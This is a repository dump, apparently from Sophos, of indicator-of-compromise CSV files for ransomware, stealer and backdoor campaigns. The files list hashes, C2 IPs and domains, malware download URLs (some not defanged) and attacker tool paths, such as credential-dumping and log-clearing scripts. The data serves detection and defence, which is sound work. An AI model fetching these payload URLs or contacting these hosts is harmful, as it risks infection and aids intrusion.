├── 2023-08-25 Citrix CVE-2023-3519 attacks.csv ├── 2023-10-ColdFusion-ransomware-IOCs.csv ├── 2023-12 Akira followup.csv ├── 2024-02_Payloads_associated_with_ScreenConnect_attacks.csv ├── 2025 Lumma Stealer.csv ├── 20250205_SVGspam.csv ├── 2309 Tiny Turla backdoor.csv ├── 2310 CVE-2023-40044 wsftp ransomware.csv ├── 2311 Vice Society - Rhysida IoCs.csv ├── 2404 impersonation campaign.csv ├── 2505 DragonForce targets SimpleHelp RMM.csv ├── 3CX IoCs 2023-03.csv ├── 3proxy-backdoor-IOCs.csv ├── ATK-Brutel.csv ├── Andr-FakeApp.csv ├── Android-HiddAd-T ├── Android-fauxanticovid.csv ├── Android-pakchat.csv ├── Android_C23-spyware.csv ├── Atomic-infostealer-IOCs.csv ├── CVE-2018-0798 RTFs ├── CVE-2022-26134_attacks.csv ├── CVE-2022-3236_IOCs.csv ├── CloudChat-IOCs.csv ├── Cryptorom_fakeapps_2.csv ├── DLLsideloading-PlugX-USBworm-2023-03.csv ├── FlowerStormPaaS.csv ├── Follina_CVE-2022-30190_hashes.csv ├── FoolsGoldMetaTraderShaZhuPan.csv ├── IOC-sheet_gootloader2025.csv ├── IOC_imagespam.csv ├── IOC_quishing2024.csv ├── Iranian-banking-malware.csv ├── Karma_Conti_joint_IOCs.csv ├── MAILBOMB-TEAMS-RANSOMWARE.csv ├── Mal-BadNode.csv ├── Mal-EncPk-APV_IOCs.csv ├── Malspam-OtoGonderici ├── Malware-SystemBC.csv ├── Miner-Mrbminer.csv ├── Miner-Tor2Mine.csv ├── MoDi-RAT-reflective-injection.csv ├── Nitrogen 2023-07.csv ├── OWASSRF IOCs 2023-03.csv ├── PJobRAT_IOCs.csv ├── PUA-QuickCPU_xmr-stak.csv ├── Pacific_Rim_Asnarok_iocs.csv ├── Pacific_Rim_CVE-2020-15069_IOCs.csv ├── Pacific_Rim_Covert_Channels_IOCs.csv ├── Pacific_Rim_Cyberoam_acct_IOCs.csv ├── Pacific_Rim_Defending_Forward_IOCs.csv ├── Pacific_Rim_Personal_Panda_IOCs.csv ├── Pacific_Rim_Under_The_Radar_IOCs.csv ├── Qakbot-onenote-attacks.csv ├── README.md ├── Ransom-Lockbit_20220412.csv ├── Ransomware-AstroLocker.csv ├── Ransomware-BlackByte.csv ├── Ransomware-Conti.csv ├── Ransomware-Dharma-RaaS.csv ├── Ransomware-Dharma-console-history-toolbelt-script.txt ├── Ransomware-Egregor.csv ├── Ransomware-EpsilonRed.csv ├── 
Ransomware-LockBit ├── Ransomware-LockBit.csv ├── Ransomware-Lockbit3-IOCs.csv ├── Ransomware-Matrix ├── Ransomware-Maze.csv ├── Ransomware-MegaCortex ├── Ransomware-Midas.csv ├── Ransomware-MountLocker.csv ├── Ransomware-Netfilim.csv ├── Ransomware-Netwalker ├── Ransomware-Play.csv ├── Ransomware-ProLock.csv ├── Ransomware-Qilin-STAC4365.csv ├── Ransomware-REvil-Kaseya.csv ├── Ransomware-Ryuk.csv ├── Ransomware-Snatch ├── Ransomware_BlackCat - triple ransomware attack.csv ├── Ransomware_BlackKingDom.csv ├── Ransomware_DearCry.csv ├── Ransomware_Hive - triple ransomware attack.csv ├── Ransomware_Lockbit - triple ransomware attack.csv ├── Ransomware_Prolock_services_stopped.csv ├── Ransomware_prolock_processes_stopped.csv ├── STAC1807_June_update.csv ├── STAC6451_IOCs.csv ├── ShaZhuPanfakeapps.csv ├── Stealer-Baldr ├── Sunburst_blocklists.csv ├── Troj-Agent-BKJE.csv ├── Troj-AgentTesla.csv ├── Troj-BazarBackdoor.csv ├── Troj-BazarLd.csv ├── Troj-BuerLd-A.csv ├── Troj-DocDL-AEOL.csv ├── Troj-DropperAsAService.csv ├── Troj-Emotet-Ukraine_maldocs.csv ├── Troj-KilllSomeOne.csv ├── Troj-Kingmine ├── Troj-Miner-AED.csv ├── Troj-PS-FX.csv ├── Troj-Polazert_IOCs.csv ├── Troj-Qakbot.csv ├── Troj-Ransom-GXS.csv ├── Troj-gootloader.csv ├── Troj-gootloader.yara ├── Troj_Agent-BJJB.csv ├── Troj_GuLoader.csv ├── Trojan-Glupteba ├── Trojan-LDMiner.csv ├── Worm-Raspberry-Robin.csv ├── Worm-WannaCry ├── Zemana-driver-IoCs.csv ├── atk-backstab-d.csv ├── bitcoin-addys ├── crimson_palace_2.csv ├── crimson_palace_post-08-2023.csv ├── crimson_palace_prior_intrusions.csv ├── crimson_palace_stac1248-alpha.csv ├── crimson_palace_stac1305_charlie.csv ├── crimson_palace_stac1870_bravo.csv ├── defi-mining-scams-iocs.csv ├── double-dragon-breath-iocs.csv ├── email account compromise 365 2023-06.csv ├── files_hosted_on_discord.csv ├── fleeceware-chatbot-apps.csv ├── gootloader_cats_iocs.csv ├── mal-fakealert.csv ├── maldrivers_release_2.csv ├── malware-MyKings ├── malware-MyKings-domains ├── 
malware-MyKings-v2.csv ├── malware-Raticate ├── malware-raticate-cloudeye.csv ├── ms-msdt restore registry key.reg ├── papercut-nday-indicators-of-compromise.csv ├── raccoonstealer.csv ├── ransomware_atomsilo.csv ├── ransomware_memento.csv ├── repository-backdoor-IOCs.csv ├── smishing campaign targeting Indian customers 2023-04.csv └── usb worm with global reach.csv /2023-08-25 Citrix CVE-2023-3519 attacks.csv: -------------------------------------------------------------------------------- 1 | Indicator,Data,Notes 2 | Description,Indicators of compromise and exploitation by threat actors using CVE-2023-3519,Source: https://infosec.exchange/@SophosXOps/110951651051968204 3 | IP,45.66.248.189,C2 server (Citrix incident) 4 | file_path_name,C:\Users\\Downloads\sh.ps1,Threat actor script (Citrix incident) 5 | IP,85.239.53.49,"C2 server (incident one, pre-Citrix)" 6 | file_path_name,C:\Users\%user%\Documents\gen.ps1,"Threat actor script (incident one, pre-Citrix)" 7 | file_path_name,C:\Users\%user%\Documents\faf.ps1,"Threat actor script (incident one, pre-Citrix)" 8 | file_path_name,C:\PerfLogs\Once.ps1,"(incident one, pre-Citrix)" 9 | file_path_name,C:\PerfLogs\plink.exe,"(incident one, pre-Citrix)" 10 | file_path_name,C:\PerfLogs\pscp.exe,"(incident one, pre-Citrix)" 11 | URL,173-44-141-47.nip.io,"C2 (incident one, pre-Citrix)" 12 | file_path_name,/var/netscaler/logon/LogonPoint/uiareas/%random%.php,"webshells found in this location on some Citrix servers, per https://www.shadowserver.org/news/technical-summary-of-observed-citrix-cve-2023-3519-incidents/" 13 | sha256,ec89ec41f0e0a7e60fa3f6267d0197c7fa8568e11a2c564f6d59855ddd9e1d64,"malicious .net DLL" 14 | sha256,bb28ba8d838c8eefdd5ae1e23d5872968d84e8cb86bf292b2c3bf4c84ad7dbd0,php webshell 15 | sha256,383df272841f9a677ee03f6f553bc6cf3197427d792dc9f86b7fb1911dc83d71,php webshell 16 | sha256,20b375ac4487a5955d4b0dd0a600e851d1e455a30c3f8babd0e7e1e97d11a073,malicious ps1 17 | 
sha256,857d6f7e4b96738adb9cc023e2c504362fe8b73bdce422f8f8cb791dd6ac2449,php webshell 18 | sha256,94f09d01e1397ca80c71b488b8775acfe2776b5ab42e9a54547d9e5f58caf11a,malicious .net DLL 19 | sha256,01717ce6fe0f79c4dc935549c516e4a1941cb4a4e84233e8fdff447177ce556e,php webshell 20 | sha256,03657d8f9dcb49a690d4b07da4f49ead58000efe458ca3ba7f878233dd25e391,php webshell 21 | sha256,2d53aaa2638f9a986779b9e36a7b6dfdaddf3cc06698f4aa9f558c1a0591dc9a,malicious .net DLL 22 | ,, 23 | -------------------------------------------------------------------------------- /2023-10-ColdFusion-ransomware-IOCs.csv: -------------------------------------------------------------------------------- 1 | Indicator,Data,Notes 2 | Description,Indicators of compromise and exploitation by threat actor exploiting ColdFusion 11,Source: https://news.sophos.com/en-us/2023/10/19/ransomware-actor-exploits-coldfusion-servers-but-comes-away-empty-handed/ 3 | ip,185.74.222.92:44,repository for malware 4 | filename,watchdogs.ps1,CobaltStrike shellcode 5 | filename,invoke-powershelltcp.ps1,reverse PowerShell shell 6 | filename,oftenExcute.ps1,CobaltStrike shellcode 7 | filename,ftps.exe,CobaltStrike shellcode 8 | filename,LB3.exe,Ransomware - Possibly delivered through CS beacon 9 | filename,LKl23s.exe,Ransomware - Possibly delivered through CS beacon 10 | filename,evil.hta,HTML application to install CobaltStrike shellcode 11 | filename,Ww3wb.exe,Ransomware - Possibly delivered through CS beacon 12 | sha256,b1b8664a09a3157c656a2b7d920a8bf8f802ee026b3fdf0eb6028c943159757c,CobaltStrike Shellcode 13 | sha256,0f1e223eaf8b6d71f65960f8b9e14c98ba62e585334a6349bcd02216f4415868,Reverse PowerShell shell 14 | sha256,8984b4a0739c4a8645447b13ea13a1c8e900b8b71e56f5a17e03ad9632df12dd,CobaltStrike Shellcode 15 | sha256,7068468b8054fdcef61e2c740fb51b30007d2916e8faa65c119ec694e375b649,CobaltStrike Shellcode inject 16 | sha256,0f888a51e70f8d92e391999f4a37fbe3bcca770cd67dc0ed2f914e03b2fff31d,CobaltStrike shellcode 17 | 
sha256,d1d2df9dd639423ca622c20da49ede99b8405079d49215e5fee7e42bf086a1c5,Ransomware 18 | sha256,720ef38246a0cdb12212deeadcd93de2879e887712b47e21559e1bf771400979,HTML application to install CobaltStrike shellcode 19 | sha256,0bc225be15a50e1f718733feb9f6ad4c1bc6513acfd6348db85ee09cb3389c28,CobaltStrike shellcode 20 | sha256,60e2d81176b33fc198a495ffd8dc70e2052bd0452cfa2ba31229e905a5774dda,Ransomware - Possibly delivered through CS beacon 21 | sha256,c8c03e40cad417e9a93aa062004bb5748ba9989c271005524edc6eb5a4585e6e,Ransomware - Possibly delivered through CS beacon -------------------------------------------------------------------------------- /2023-12 Akira followup.csv: -------------------------------------------------------------------------------- 1 | Indicator,Data,Note 2 | Description,https://news.sophos.com/en-us/2023/12/21/akira-again-the-ransomware-that-keeps-on-taking/,Akira followup post 3 | IP,45.227.254.26, 4 | IP,80.66.88.203, 5 | IP,91.240.118.29, 6 | IP,152.89.196.111, 7 | IP,194.26.29.102, 8 | IP,185.11.61.114, 9 | sha256,dfee389e1ffa09ed81adcf0d0f165d859e0c045ad7d90f6edcf3f96dfcceba2b,w.exe ransomware binary 10 | sha256,1c1ef7736dd95ea9aa2dc5784dc51977a1d890c92159e16315ef15546556bcdf,1.exe ransomware binary 11 | sha256,b711f7617f507053a131a75b0971409f76663b404aa1c51bfbe2cd32f2ac8fb8,Locker.exe ransomware binary 12 | sha256,681697c35dbb1beba9886f5c44882ccca32dd7e9e483a381e981e7409a0e35cb ,C:\programdata\start.bat 13 | sha256,be8257317bea80a1ed670d70eb4f21bba246c266a59724185b366c2dcfb2b8ea,C:\ProgramData\Microsoft\crome.exe 14 | sha256,2b02d732c6c46d8cb3758851c9e79a52761956109f55407c1a5d693a8a1af1f3,w.zip 15 | -------------------------------------------------------------------------------- /2024-02_Payloads_associated_with_ScreenConnect_attacks.csv: -------------------------------------------------------------------------------- 1 | Indicator_type,Data,Note 2 | Description,Indicators related to malware abuse of ScreenConnect 
vulnerabilities,https://news.sophos.com/en-us/2024/02/23/connectwise-screenconnect-attacks-deliver-malware/ 3 | sha256,0d185ea3b0a49c2fa65bfd2757c9d0705657f0639fd36f196ac394fcd38c361d,malware. Uses Sophos in properties. 4 | sha256,11d2dde6c51e977ed6e3f3d3e256c78062ae41fe780aefecfba1627e66daf771,malware with Sophos name in properties; source hxxp://207.246.74.189:804/download/Diablo.log 5 | sha256,1362e6d43b068005f5d7c755e997e6202775430ac15a794014aa9a7a03a974e7,"hxxp://185.232.92.32:8888/Logs.txt - Malicious Data, which will be loaded by (SentinelAgentCore.dll)" 6 | sha256,19fc383683b34ba31ed055dc2e546a64eecbe06d79b6cc346773478c84f25f92,Installer for ScreenConnect distributed by threat actors. source hxxps://transfer.sh/get/6YoVhBPfKE/temp2.exe 7 | sha256,254714b7028005596fd56bdbe30bfc77f02bbe274048d0982118d93966e79331,"hxxp://185.232.92.32:8888/all.ps1 - Malicious Script downloads payload (SentinelUI.exe,SentinelAgentCore.dll,Logs.txt) - Sideloading " 8 | sha256,2da975fee507060baa1042fb45e8467579abf3f348f1fd37b86bb742db63438a,"""enc.exe"" ransomware executable" 9 | sha256,3818bb7adf60f8c2aeb5fe8c59b81fc7eb7f1471a80932610dc9a294ba7ba543,malware script that decodes to an executable. Source hxxp://91.238.181.238/a 10 | sha256,444338339260d884070de53554543785acc3c9772e92c5af1dff96e60e67c195,Payload from f1c7045badec0b9771da4a0f067eac99587d235d1ede35190080cd051d923da6 - %temp%\xw.exe 11 | sha256,55e4ce3fe726043070ecd7de5a74b2459ea8bed19ef2a36ce7884b2ab0863047 ,AnyDesk installer distributed by threat actors. Source hxxp://116.0.56.101:9191/images/Distribution.exe 12 | sha256,858ddfe6530fb00adb467f26e2c8f119fef284e1e9b6c92f0634f403ee3e7913,source hxxp://shapefiles.fews.net.s3.amazonaws.com:80/8gaLYHLcZ4DPV 13 | sha256,86b5d7dd88b46a3e7c2fb58c01fbeb11dc7ad350370abfe648dbfad45edb8132,Installer for SimpleHelp distributed by threat actors. 
source hxxps://transfer.sh/get/HcrhQuN0YC/temp3.exe 14 | sha256,8c2d246bf93bf84f6d4376cd46d8fcc3cb9c96d9bef7d42c23ff222d8f66eeaf,crypt64ult.exe ransomware executable inside of msappdata.msi 15 | sha256,8e51de4774d27ad31a83d5df060ba008148665ab9caf6bc889a5e3fba4d7e600,source hxxp://23.26.137.225:8084/msappdata.msi 16 | sha256,9b3327f9ea7c02c6909a472a3c1abb562b19ae72d733a8e2e990e975b5f8a5d0,Payload from 3818bb7adf60f8c2aeb5fe8c59b81fc7eb7f1471a80932610dc9a294ba7ba543 - Cobalt Strike 17 | sha256,a39d9b1b41157510d16e41e7c877b35452f201d02a05afa328f1bcd53d8ee016,hxxp://185.232.92.32:8888/SentinelAgentCore.dll - Malicious DLL Component (Loader) 18 | sha256,a50d9954c0a50e5804065a8165b18571048160200249766bfa2f75d03c8cb6d0,Ransomware binary built using the leaked Lockbit 3 builder tool 19 | sha256,c94038781c56ab85d2f110db4f45b86ccf269e77a3ff4b9133b96745ff97d25f,"""UpdaterScreenConnect.exe"" malware" 20 | sha256,de42bd53cb0944da8bc33107796ecf296d00968725eed1763a8143cef90e2297,hxxp://185.232.92.32:8888/sentinelui.exe - Clean File used for sideloading malicious dll 21 | sha256,f1c7045badec0b9771da4a0f067eac99587d235d1ede35190080cd051d923da6 ,script that decodes itself to become a malware executable 22 | sha256,f3f5d3595559cad6019406d41f96fa88c69d693326cdf608c5fc4941fdf6a8ec,r.bat file that downloads 858ddfe6530fb00adb467f26e2c8f119fef284e1e9b6c92f0634f403ee3e7913 23 | sha256,b423d100e7aa2e576c8f21586f1d8924b34c3e9ed4cfdba40d121e21c3618445,decoded powershell script 24 | url,hxxp://116.0.56.101:9191/images/Distribution.exe,Anydesk installer distributed by threat actors 25 | url,hxxp://119.3.12.54:8000/identity_helper.exe,URL observed in ScreenConnect attacks. Payload not retrieved. 26 | url,hxxp://159.65.130.146:4444/a,URL observed in ScreenConnect attacks. Payload not retrieved. 27 | url,hxxp://159.65.130.146:4444/svchost.exe,URL observed in ScreenConnect attacks. Payload not retrieved. 28 | url,hxxp://185.232.92.32:8888/all.ps1,URL observed in ScreenConnect attacks. 
Payload not retrieved. 29 | url,hxxp://185.232.92.32:8888/Logs.txt,URL observed in ScreenConnect attacks. Payload not retrieved. 30 | url,hxxp://185.232.92.32:8888/SentinelAgentCore.dll,URL observed in ScreenConnect attacks. Payload not retrieved. 31 | url,hxxp://185.232.92.32:8888/sentinelui.exe,URL observed in ScreenConnect attacks. Payload not retrieved. 32 | url,hxxp://207.246.74.189:804/download/Diablo.log,Malicious stealer. File has properties that identify it as Sophos ML Model model.dll 33 | url,hxxp://91.238.181.238/a,3818bb7adf60f8c2aeb5fe8c59b81fc7eb7f1471a80932610dc9a294ba7ba543 34 | url,hxxps://transfer.sh/get/6YoVhBPfKE/temp2.exe,Installer for ScreenConnect distributed by threat actors 35 | url,hxxps://transfer.sh/get/HcrhQuN0YC/temp3.exe,Installer for SimpleHelp remote access utility distributed by threat actors 36 | -------------------------------------------------------------------------------- /2025 Lumma Stealer.csv: -------------------------------------------------------------------------------- 1 | Indicator_type,Data,Note 2 | Description,A deep-dive look at research concerning Lumma Stealer,https://news.sophos.com/en-us/2025/05/09/lumma-stealer-coming-and-going/ ‎ 3 | url,hxxps[://]fixedzip[.]oss-ap-southeast-5[.]aliyuncs[.]com/new-artist[.]txt ,Hosts PowerShell scripts which connect to other URLs and download zip file 4 | domain,snail-r1ced[.]cyou,Hosts PowerShell scripts which connect to other URLs and download zip file 5 | ip,104.21.84[.]251,IP addresses of the C2 (Command and Control) used 6 | filename,AutoIt3.exe,"File which, when downloaded, drops multiple files and copies all of them to produce the malicious autoit script in %temp% directory" 7 | sha1,SHA1: e298cd6c5fe7b9b05a28480fd215ddcbd7aaa48a,Hash value of AutoIt3.exe 8 | url,hxxps[://]FUGTGU76v1[.]b-cdn[.]net/nxt/ilt[.]txt,Hosts PowerShell script which connects to other URLs and downloads zip file 9 | url,hxxps[://]FUGTGU76v1[.]b-cdn[.]net/iltst[.]zip,Hosts PowerShell script which 
connects to other URLs and downloads zip file 10 | url,hxxps[:]//fixedzip[.]oss-ap-southeast-5[.]aliyuncs[.]com/pioneer[.]txt,Hosts PowerShell script which connects to other URLs and downloads zip file 11 | url,hxxps[:]//fixedzip.oss-ap-southeast-5.aliyuncs.com/pioneer.zip,Hosts PowerShell script which connects to other URLs and downloads zip file 12 | url,hxxps[://]fixedzip[.]oss-ap-southeast-5[.]aliyuncs[.]com/new-artist[.]txt,Hosts PowerShell script which connects to other URLs and downloads zip file 13 | url,hxxps[:]//fixedzip.oss-ap-southeast-5.aliyuncs.com/artist.zip,Hosts PowerShell script which connects to other URLs and downloads zip file 14 | url,hxxps[://]evolytix[.]com/wp-includes/fonts/CewtlSPn[.]txt,Hosts PowerShell script which connects to other URLs and downloads zip file 15 | ip,104[.]21[.]84[.]25,IP addresses of the C2 (Command and Control) used 16 | ip,156[.]59[.]126[.]78,IP addresses of the C2 (Command and Control) used 17 | ip,141[.]193[.]213[.]10,IP addresses of the C2 (Command and Control) used 18 | filename,ArtistSponsorship.exe ,"File when downloaded, drops multiple files and copy all of them to produce the malicious autoit script in %temp% directory" 19 | sha1,SHA1: e298cd6c5fe7b9b05a28480fd215ddcbd7aaa48a,Hash value of ArtistSponsorship.exe 20 | url,hxxps[://]www[.]googleadservices[.]com/pagead/aclk?sa=L&ai=DChcSEwi9isbdsrCKAxV1LXsHHZq8M0wYABAAGgJ0bQ&ae=2&aspm=1&co=1&ase=5&gclid=EAIaIQobChMIvYrG3bKwigMVdS17Bx2avDNMEAAYASAAEgKomfD_BwE&ohost=www[.]google[.]com&cid=CAASJuRosMAh_pmnrKgHnRyE4Lfiv_5QusyXIVc1HY8a6Eo87L0RZ4Qh&sig=AOD64_3NyGNBHFXQ9B_h3-F3Fyp0oe4HrQ&q&adurl&ved=2ahUKEwj95L3dsrCKAxU_zDgGHdUBKfsQ0Qx6BAgOEAE&nis=7&dct=1&suid=30426012769&ri=26,URL for malicious Google ad posing as a legitimate site 21 | url,hxxps[://]usermanualplatform[.]com/?gad_source=5&gclid=EAIaIQobChMIq7Dp5rKwigMVXaRmAh3uXySREAAYASAAEgLFUPD_BwE,URL that users are redirected to after clicking on the fake Google ad 22 | 
url,hxxps[://]usermahnualplatform-14[.]site/MNL14/instruction_695-18014-012_rev[.]php,Malicious URL that presents a Fake Captcha notification 23 | url,hxxps[://]klipdexypoi[.]shop/wassap[.]mp4 ,URL holding the initial payload for the Lumma Stealer malware 24 | domain,peelyitemsn[.]click,Hosts PowerShell scripts which connect to other URLs and download zip file 25 | domain,sordid-snaked[.]cyou,Hosts PowerShell scripts which connect to other URLs and download zip file 26 | domain,immureprech[.]biz,Hosts PowerShell scripts which connect to other URLs and download zip file 27 | domain,deafeninggeh[.]biz,Hosts PowerShell scripts which connect to other URLs and download zip file 28 | domain,effecterectz[.]xyz,Hosts PowerShell scripts which connect to other URLs and download zip file 29 | domain,diffuculttan[.]xyz,Hosts PowerShell scripts which connect to other URLs and download zip file 30 | domain,debonairnukk[.]xyz,Hosts PowerShell scripts which connect to other URLs and download zip file 31 | domain,wrathful-jammy[.]cyou,Hosts PowerShell scripts which connect to other URLs and download zip file 32 | domain,awake-weaves[.]cyou ,Hosts PowerShell scripts which connect to other URLs and download zip file 33 | filename,Nhtfrh.csv ,"File which, when downloaded, drops multiple files and copies all of them to produce the malicious autoit script in %temp% directory" 34 | sha1,SHA1: 337424610694e00ebac66d36dd20e535c7a92164,Hash value of Nhtfrh.csv 35 | -------------------------------------------------------------------------------- /2309 Tiny Turla backdoor.csv: -------------------------------------------------------------------------------- 1 | Indicator,Data,Notes 2 | Description,Not So Tiny Turla,https://infosec.exchange/@SophosXOps/111109357153515214 3 | sha256,0409c9b12f9d0eda86e461ed9bdabeefb00172b26322079681a0bdf48e68dc28,C:\Windows\System32\downlevel\ShellExperienceHost.exe 4 | file_path_name,C:\Windows\System32\downlevel\ShellExperienceHost.exe,filepath for 
0409c9b12f9d0eda86e461ed9bdabeefb00172b26322079681a0bdf48e68dc28 5 | sha256,2a2501121b69c63c8e11fe581b5cb57487ed17c386b6376a16c6eed590f1d40e,C:\Windows\Temp\cloudflared.exe 6 | file_path_name,C:\Windows\Temp\cloudflared.exe ,filepath for 2a2501121b69c63c8e11fe581b5cb57487ed17c386b6376a16c6eed590f1d40e 7 | sha256,5f4f01d97cce1f12c312be676dba3a8800881d89544117d83feed911d8968dd2,C:\Windows\System32\smpsvc.dll 8 | file_path_name,C:\Windows\System32\smpsvc.dll ,filepath for 5f4f01d97cce1f12c312be676dba3a8800881d89544117d83feed911d8968dd2 9 | sha256,d205fcadadf33d3d0ed7c0399861ce67f58c39b83ea27043a47d20575ff68873,Smphost.dat 10 | url,https://cache.chartbaet.com ,C2 11 | -------------------------------------------------------------------------------- /2310 CVE-2023-40044 wsftp ransomware.csv: -------------------------------------------------------------------------------- 1 | Indicator,Data,Notes 2 | Description,CVE-2023-40044 wsftp ransomware,https://infosec.exchange/@SophosXOps/111222941977295158 3 | sha256,232a0585a7cb6c54e15d5410c96aac5913038e7f,GodPotato-NET35.exe 4 | sha256,34e4d070aafbaddb99d2851e0c08ba0b49ccf7c5,LB3.exe (Ransomware) 5 | sha256,8aebf427d02cddba5b58175ecf30da9f1df83de3,goodbye.ps1 6 | sha256,bf16b3222e52274a99fb4d18a7b0ad27927008ad,script.ps1 7 | -------------------------------------------------------------------------------- /2311 Vice Society - Rhysida IoCs.csv: -------------------------------------------------------------------------------- 1 | Indicator,Data,Note, 2 | Description,https://news.sophos.com/en-us/2023/11/10/vice-society-and-rhysida-ransomware/,"Same threats, different ransomware: a threat cluster’s switch from Vice Society to Rhysida; 11 November 2023", 3 | ip address ,5.39.222.67 ,C2 Server, 4 | ip address ,5.255.99.59,C2 Server, 5 | ip address ,51.77.102.106 ,C2 Server, 6 | ip address ,108.62.118.136,C2 Server, 7 | ip address ,108.62.141.161 ,C2 Server, 8 | ip address ,146.70.104.249 ,C2 Server, 9 | ip address ,156.96.62.58 ,C2 
Server, 10 | ip address ,157.154.194.6,C2 Server, 11 | SHA256 hash,b25b87cfcedc69e27570afa1f4b1ca85aab07fd416c5d0228f1fe32886e0a9a6,PortStarter DLL, 12 | filename,C:\ProgramData\temp_l0gs\,Credential Dumping , 13 | filename,C:\Users\Public\secretsdump.exe,Credential Dumping Tool, 14 | filename,.LOCAL\s$\w.ps1,Data Collection Script, 15 | filename,s$\p1.ps1,Data Collection Script, 16 | filename,CriticalBreachDetected.pdf,Extortion Note, 17 | filename,C:\Downloads\MEGAsyncSetup64.exe,Mega Sync Installer, 18 | filename,C:\Downloads\Advanced_IP_Scanner_2.5.4594.1.exe,Network Scanner, 19 | filename, C:\Users\Public\main.dll,PortStarter DLL, 20 | filename,C:\ProgramData\schk.dll,PortStarter DLL, 21 | filename,C:\Windows\Tasks\windows32u.dll,PortStarter DLL, 22 | filename,C:\Windows\Tasks\windows32u.ps1,PortStarter Script, 23 | filename,Invoke-ZeroLogon.ps1,Privilege Escalation Script, 24 | filename,PsExec.exe,PsExec, 25 | filename,C:\s$\PsExec.exe,PsExec, 26 | filename,C:\Programdata\Veeam\svchost.ps1,SystemBC, 27 | filename,WinSCP.exe,WinSCP, 28 | filename,C:\ProgramData\AnyDesk.exe,Anydesk, 29 | -------------------------------------------------------------------------------- /2505 DragonForce targets SimpleHelp RMM.csv: -------------------------------------------------------------------------------- 1 | Indicator_type,Data,Note 2 | Description,https://news.sophos.com/en-us/2025/05/27/dragonforce-actors-target-simplehelp-vulnerabilities-to-attack-msp-customers/,IoCs from research in article 3 | file_path,C:\ProgramData\JWrapper-Remote Access\JWAppsSharedConfig\working\toolbox-9759076704687761247\win.exe ,DragonForce ransomware binary  4 | sha256,cee6a7663fad90c807c9f5ea8f689afd0e4ece04f8c55d7a047a7215db6be210 ,DragonForce ransomware binary  5 | filename,PUSH PUSh PUUUUUSH.bat ,Batch script to list and clear all Windows Event logs  6 | file_path,C:\Users\\Videos\PUSH PUSh PUUUUUSH.bat ,Batch script to list and clear all Windows Event logs  7 | 
-------------------------------------------------------------------------------- /3CX IoCs 2023-03.csv: -------------------------------------------------------------------------------- 1 | Indicator,Data,Note 2 | Description,https://news.sophos.com/en-us/2023/03/29/3cx-dll-sideloading-attack/ ‎,Indicators of 3CX DLL-sideloading exploitation Mar-2023 3 | SHA256,aa124a4b4df12b34e74ee7f6c683b2ebec4ce9a8edcf9be345823b4fdcf5d868,WIN: MSI 3cxdesktopapp-18.12.407.msi 4 | SHA256,59e1edf4d82fae4978e97512b0331b7eb21dd4b838b850ba46794d9c7a2c0983,WIN: 3cxdesktopapp-18.12.416.msi 5 | SHA256,c485674ee63ec8d4e8fde9800788175a8b02d3f9416d0e763360fff7f8eb4e02,WIN: ffmpeg.dll signed by 3CX Ltd - backdoored at entry point 6 | SHA256,7986bbaee8940da11ce089383521ab420c443ab7b15ed42aed91fd31ce833896,WIN: ffmpeg.dll - backdoored at entry point 7 | SHA256,11be1803e2e307b647a8a7e02d128335c448ff741bf06bf52b332e0bbf423b03,WIN: d3dcompiler_47.dll 8 | SHA256,4e08e4ffc699e0a1de4a5225a0b4920933fbb9cf123cde33e1674fde6d61444f,File at http[:]//raw.githubusercontent[.]com/IconStorages/images/main/icon13.ico 9 | SHA256,a64fa9f1c76457ecc58402142a8728ce34ccba378c17318b3340083eeb7acc67,MAC: libffmpeg.dylib 10 | SHA256,e6bbc33815b9f20b0cf832d7401dd893fbc467c800728b5891336706da0dbcec,MAC: 3CXDesktopApp-18.12.416.dmg -- deprecated version of software 11 | URL,raw.githubusercontent.com/IconStorages/images/main/,Used for staging encoded malware 12 | URL,akamaicontainer[.]com,C2 (malware/callhome) 13 | URL,akamaitechcloudservices[.]com,C2 (malware/callhome) 14 | URL,azuredeploystore[.]com,C2 (malware/callhome) 15 | URL,azureonlinecloud[.]com,C2 (malware/callhome) 16 | URL,azureonlinestorage[.]com,C2 (malware/callhome) 17 | URL,dunamistrd[.]com,C2 (malware/callhome) 18 | URL,glcloudservice[.]com,C2 (malware/callhome) 19 | URL,journalide[.]org,C2 (malware/callhome) 20 | URL,msedgepackageinfo[.]com,C2 (malware/callhome) 21 | URL,msstorageazure[.]com,C2 (malware/callhome) 22 | URL,msstorageboxes[.]com,C2 
(malware/callhome) 23 | URL,officeaddons[.]com,C2 (malware/callhome) 24 | URL,officestoragebox[.]com,C2 (malware/callhome) 25 | URL,pbxcloudeservices[.]com,C2 (malware/callhome) 26 | URL,pbxphonenetwork[.]com,C2 (malware/callhome) 27 | URL,pbxsources[.]com,C2 (malware/callhome) 28 | URL,qwepoi123098[.]com,C2 (malware/callhome) 29 | URL,sbmsa[.]wiki,C2 (malware/callhome) 30 | URL,sourceslabs[.]com,C2 (malware/callhome) 31 | URL,visualstudiofactory[.]com,C2 (malware/callhome) 32 | URL,zacharryblogs[.]com,C2 (malware/callhome) 33 | -------------------------------------------------------------------------------- /3proxy-backdoor-IOCs.csv: -------------------------------------------------------------------------------- 1 | Indicator,Data,Note 2 | Description,https://news.sophos.com/en-us/2024/04/09/smoke-and-screen-mirrors-a-strange-signed-backdoor,Observed IOCs for incidents involving a 3proxy backdoor 3 | sha256,0dae9c759072f9c0e5a61a9de24a89e76da35ffab8ff9610cc90df417c741f3f,Variant 4 | sha256,cec73bddc33cd11ba515e39983e81569d9586abdaabbdd5955389735e826c3c7,Variant 5 | sha256,230c9c47abb17e3caa37bcb1b8e49b30e671e6c50e88f334107e3350bee13385,Variant 6 | sha256,5a519932c20519e58a004ddbfee6c0ed46f1cee8d7c04f362f3545335904bae2,Variant 7 | sha256,4c23a199152db6596ccafb5ea2363500e2e1df04961a4ede05168999da87d39a,Variant 8 | sha256,815e21de6fab4b737c7dd844e584c1fc5505e6b180aecdd209fbd9b4ed14e4b2,Variant 9 | sha256,0ee12274d7138ecd0719f6cb3800a04a6667968c1be70918e31c6f75de7da1ba,Variant 10 | sha256,acc5c46ae2e509c59a952269622b4e6b5fa6cf9d03260bfebdfaa86c734ee6ea,Variant 11 | sha256,593f8ed9319fd4e936a36bc6d0f163b9d43220e61221801ad0af8b1db35a0de5,Variant 12 | sha256,c0c648e98ec9d2576b275d55f22b8273a6d2549f117f83a0bcc940194f1d0773,Variant 13 | sha256,d6a1db6d0570576e162bc1c1f9b4e262b92723dbabdde85b27f014a59bbff70c,Variant 14 | sha256,eccfd9f2d1d935f03d9fbdb4605281c7a8c23b3791dc33ae8d3c75e0b8fbaec6,Variant 15 | 
